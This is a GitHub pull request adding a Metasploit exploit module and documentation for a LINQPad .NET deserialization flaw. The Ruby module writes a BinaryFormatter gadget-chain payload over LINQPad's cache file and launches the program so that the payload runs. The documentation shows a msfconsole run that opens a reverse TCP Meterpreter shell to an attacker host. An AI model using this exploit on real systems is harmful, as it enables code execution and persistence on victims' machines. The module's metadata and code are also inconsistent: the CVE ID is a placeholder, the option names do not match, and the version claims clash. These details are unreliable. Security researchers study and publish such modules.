Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Linqpad deserialization #19777

Open
wants to merge 6 commits into
base: master
Choose a base branch
from
+139 −0
Open

Linqpad deserialization #19777

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
302052c
LINQPad deserialization module init
msutovsky-r7 Dec 30, 2024
2a51f45
Merge branch 'rapid7:master' into linqpad_deserialization
msutovsky-r7 Dec 30, 2024
058e7be
Cleaning up module
msutovsky-r7 Dec 30, 2024
93c2360
Renaming module to persistence module instead
msutovsky-r7 Jan 9, 2025
2f351ea
Addressing some issues
msutovsky-r7 Jan 10, 2025
689e44f
Addressing some issues
msutovsky-r7 Jan 10, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
50 changes: 50 additions & 0 deletions documentation/modules/exploit/windows/local/linqpad_deserialization.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
## LINQPad 5.48 Deserialization

LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/).

## Verification Steps
Steps:

1. Install the application
2. Start msfconsole
3. Get Meterpreter/cmd shell
4. Run: `use windows/local/linqpad_deserialization`
5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
5. Set parameters `session`, `cache_path`, `linqpad_path`
6. Run exploit

## Options

### cache\_path

The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.

### linqpad\_path

Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit.

Example:

```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 192.168.95.128
msf6 exploit(multi/handler) > set LPORT 4242
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.95.128:4242
[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization
msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_PATH C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd
msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad
msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe
msf6 exploit(windows/local/linqpad_deserialization) > set session 1
msf6 exploit(windows/local/linqpad_deserialization) > exploit
[*] Exploit completed, but no session was created.
```

Previous example will run `calc.exe` when LINQPad will start.

89 changes: 89 additions & 0 deletions modules/exploits/windows/local/linqpad_deserialization_persistence.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,89 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

# includes file?, directory?
include Msf::Post::File

# includes generate
include Msf::Util::DotNetDeserialization

def initialize(info = {})
super(
update_info(
info,
# The Name should be just like the line of a Git commit - software name,
# vuln type, class. Preferably apply
# some search optimization so people can actually find the module.
# We encourage consistency between module name and file name.
'Name' => 'LINQPad Deserialization Exploit',
'Description' => %q{
This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.
},
'License' => MSF_LICENSE,
'Author' => [
'msutovsky-r7 <[email protected]>',
'James Williams' # original research
],
'Platform' => 'win',
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Windows', { 'Arch' => ARCH_CMD } ]],
# 'Privileged' => true,
'References' => [
[ 'URL', 'https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad'],
[ 'CVE', '1978-1234']
],
'DisclosureDate' => '2024-12-03',
'DefaultTarget' => 0,
# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']),
OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']),
OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish'])
])
end

# Simplify pulling the writable directory variable

def check
if datastore['LINQPAD_PATH'].blank? || !file?(datastore['LINQPAD_PATH'])
return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist')
elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist')
elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
return Exploit::CheckCode::Unknown('Cannot find cache file')
elsif file?(datastore['CACHE_PATH'] + '/autorefcache46.2.dat')
return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad')
else
return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable')
end
end

def exploit
# generate payload
dotnet_payload = ::Msf::Util::DotNetDeserialization.generate(
payload.encoded, # this is the Operating System command to run
gadget_chain: :TextFormattingRunProperties,
formatter: :BinaryFormatter
)
# try to overwrite cache file
fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload)

# run LINQPad and trigger deserialization
fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPAD_PATH'])

# add cleanup option
register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP']
end
end
Loading